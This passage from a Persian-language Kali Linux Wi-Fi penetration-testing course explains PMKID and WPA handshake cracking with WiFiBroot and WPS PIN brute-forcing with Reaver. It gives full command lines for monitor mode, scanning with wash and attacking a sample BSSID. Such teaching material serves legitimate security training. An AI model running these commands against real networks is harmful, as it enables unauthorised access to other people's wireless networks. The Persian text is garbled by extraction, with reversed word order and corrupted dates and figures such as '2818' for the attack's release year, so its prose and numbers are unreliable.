    Options: Args Description Required -h, --help Show this help manual NO -i, --interface Monitor Interface to use YES -v, --verbose Turn off Verbose mode. NO -d, --dictionary Dictionary for Cracking YES -w, --write Write Captured handshake to a seperate file NO Filters: -e, --essid ESSID of listening network -b, --bssid BSSID of target network. -c, --channel Channel interface should be listening on. Default: ALL

    منظور گرفتن هندشیک و کرک آن دستور زیر را وارد کنید:برای مثال به

    airmon-ng start wlan0 python2.7 wifibroot.py --mode 1 -i wlan0mon --verbose -d dict.txt -w output.cap

    را وارد کنید: و کرک آن دستور زیر PMKIDبرای حمله

    python2.7 wifibroot.py --mode 2 -i wlan0mon --verbose -d dict.txt -w output.txt

    توانید دستور زیر را اجرا کنید:می PMKIDو تنها برای کرک آفالین

    python2.7 wifibroot.py --mode 3 --type pmkid --verbose -d dict.txt --read output.txt

    آوریم و حمله را به صورت خودکار اجرا کنیم.را بدست می PSKتوانیم کلید میترتیب به این

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 11

    توضیحات تکمیلی

    -WPA2منتشر شد و یک روش جدید برای حمله به اکسس پوینت با رمزگذاری 2818در آگوست PMKIDحمله PSK وینت کالینت با اکسس پبه ما ارائه می دهد. زیبایی این حمله این است که نیازی نداریم منتظر بمانیم تا

    جدا کنیم. این کار موفقیت دریافت هندشیک را به میزان قابل توجهی APخودش ارتباط برقرار کند یا او را از درصد موارد برروی روترها قابل اکسپلویت است. 18دهد. این حمله در افزایش می

    طرفه قرار دارد، دریافت کنیم. اولین 1ک را که در بسته اول هندشی PSKمی توانیم کلید PMKIDبا استفاده از ارسال می شود که شامل چند کلید تصادفی برای رمزگذاری داده ها APطرفه معموال توسط 1بسته هندشیک

    ارتباط برقرار کند تا APمورد نیاز ما است. کالینت )کاربر، هکر( فقط باید با PMKIDو همچنین شامل کلید ( و PMKID (Pairwise Master Key Identifierارسال شود. بنابراین هکر با شنود برای او EAPOLاولین پیام

    تواند فرایند کرک کلید را آغاز کند.دریافت آن می

    Reaverبا استفاده از WPSکرک WPS مخففWi-Fi Protected Setup است و به گونه ای طراحی شده است که اتصال کاربران بهAP را امن

    کشف شد که یک نقص طراحی جدی 2811معرفی شد و در سال 2881و ساده تر کند. اولین بار در سال ای )حمله brute forceبروت فورس Reaverمی تواند به سادگی با استفاده از ابزارهایی مانند WPSدارد. پین

    برای کرک پسورد( شود.

    چیست؟ Reaverابزار

    یبرداربهره رلسیوا یدر روترها یتیحفره امن کیاست که از WPSکرک یمتن باز برا ابزار کی Reaver وریر از نوکسیل یابزار در کال نیکرک کند. ا یآن فعال است را به آسان WPSکه یتواند پسورد روتر یو م کندیم

    . دیسورس کد آن نصب کن قیاز طر نوکسیل یعهایتوز ریآن را در سا دیتوان یقبل نصب شده است، اما شما مReaver نیشماره پ هیحمله بروت فورس را عل کی WPS بعد از پیدا کردن پین دهد. یانجام م نتیاکسس پو

    WPS کلید ،WPA-PSK .قابل بازیابی است

    توضیحات حمله:

    Reaver تابع ثبت کننده خارجی را که توسط مشخصاتWi-Fi Protected Setup تنظیم شده، هدف قرار می شناسد. ثبت کنندگان ممکن را می APرقمی 8برای تایید اعتبار، باید نشان دهد که شماره پین registrarدهد.

    انجام EAPبر روی WPSتایید اعتبار کنند. از آنجا که پروتکل APاست در هر زمان و بدون تعامل کاربر، با یک ندارد. APدانستن کلید ی به همراه باشد و نیاز APمی شود، ثبت کننده فقط باید با

    Reaver یک حمله بروت فورس را علیهAP رقمی 8انجام می دهد و برای به دست آوردن شماره پینAP هرکند. این ابزار ابتدا نیمه اول پین و سپس نیمه دوم پین را بروت فورس می نوع ترکیب ممکن را آزمایش می

    تالش بدست آورد. بعد از 18111را می توان در WPSکند، به این معنی که کل فضای کلید برای شماره پین استفاده کرد. WPA2ر( )رمز عبو PSK، می توان از آن برای یافتن کلید WPSکشف کردن پین

  • 12/ سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش

    ً محدود به سرعتی است که Reaverسرعتی که می تواند APقادر به آزمایش اعداد پین است، کامالها به اندازه کافی سریع هستند که می توانند در هر ثانیه APرا پردازش کند. برخی از WPSهای درخواست

    در هر ده ثانیه به یک پین اجازه می دهند. از نظر یک پین را آزمایش کنند. اما مابقی کندتر هستند و فقط آماری فقط نیمی از این زمان به طول می انجامد تا حدس بزنید شماره درست پین را حدس بزنید.

    Reaver دبیان از طریق سورس کد، دستورات زیر را اجرا کنید: در کالی وجود دارد، اما برای نصب آن در توزیع

    sudo apt -y install build-essential libpcap-dev aircrack-ng pixiewps wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip unzip master.zip cd reaver-wps-fork-t6x* cd src ./configure make sudo make install

    رت وایرلس خود را در حالت مانیتور قرار دهیم و اگر آموزش قبلی را خوانده باشید، می دانید که ابتدا باید کا سپس شروع به اسکن کنیم.

    Monitorقرار دادن کارت وایرلس در حالت -1

    ابتدا برنامه هایی را که ممکن است باعث ایجاد مشکل شوند را متوقف کنید، سپس کارت خود را در حالت مانیتور قرار می دهید.

    airmon-ng check kill airmon-ng start wlan0

    در ترمینال iwconfigاینترفیس کارت وایرلس من است، شما می توانید به راحتی با تایپ wlan0در اینجا اینترفیس کارت وایرلس خود را بررسی کنید.

    WPSهای اسکن محیط برای شبکه -2

    Washاز دستور روترها را شناسایی کند. برای این منظور WPSنمی تواند فعال بودن Airodump-ngابزار فعال دارند را WPSنصب می شود و به ما کمک می کند تا روترهای که Reaverاستفاده می کنیم که همراه

    شناسایی کنیم.

    wash -i wlan0mon

    این دستور یک خروجی مشابه زیر را نشان می دهد.

    ( نیستند به احتمال lockهایی که قفل )توجه کنید. اکسس پوینت” WPS Locked“مخفف ” LCK“به ستون

    آن قفل است WPSکه APدهد. شما همچنین می توانید روی زیاد حمله بروت فورس بهتر روی آنها جواب می این حمله انجام دهید، اما شانس موفقیت چندان مناسب نیست.

  • سایبریت - نوکسیل یبا کال رلسیتست نفوذ واآموزش / 13

    اینجا، در

    ESSID/Target: wifi BSSID: 64:64:B3:BE:BE:07 Channel: 1 WPS Locked: No

    قادر به Reaverشود. در این حالت lockتوسط حمله بروت فورس هکر BSSIDدر بعضی موارد ممکن است، نخواهد بود. WPS pinانجام حمله

    Reaverبا ابزار WPSکرک -3

    را روی آن امتحان کنید. WPS pinاستفاده کنید تا حمله Reaverهدف، از BSSIDبعد از مشاهده

    reaver --help reaver -i wlan0mon -b 64:64:B3:BE:BE:07 -c 1 -vv

    در کمتر از چند WPA2-PSKو کلید WPSموفق شود یک پین را بعد از دیگری امتحان کند، پین Reaverاگر

    شود. در حالت ایده آل، دستور اصلی کار می کند و حمله همانطور که انتظار می رود پیشرفت ساعت کرک میداشته اند Reaverتولید کنندگان روترها سعی در محافظت در برابر حمالت به سبک می کند. اما در واقعیت،

    و ممکن است الزم باشد سوئیچ هایی به دستور اصلی اضافه کنیم تا حمله انجام شود.

    reaver -i wlan0mon -b 64:64:B3:BE:BE:07 -c 1 -vv -L -N -d 15 -T .5 -r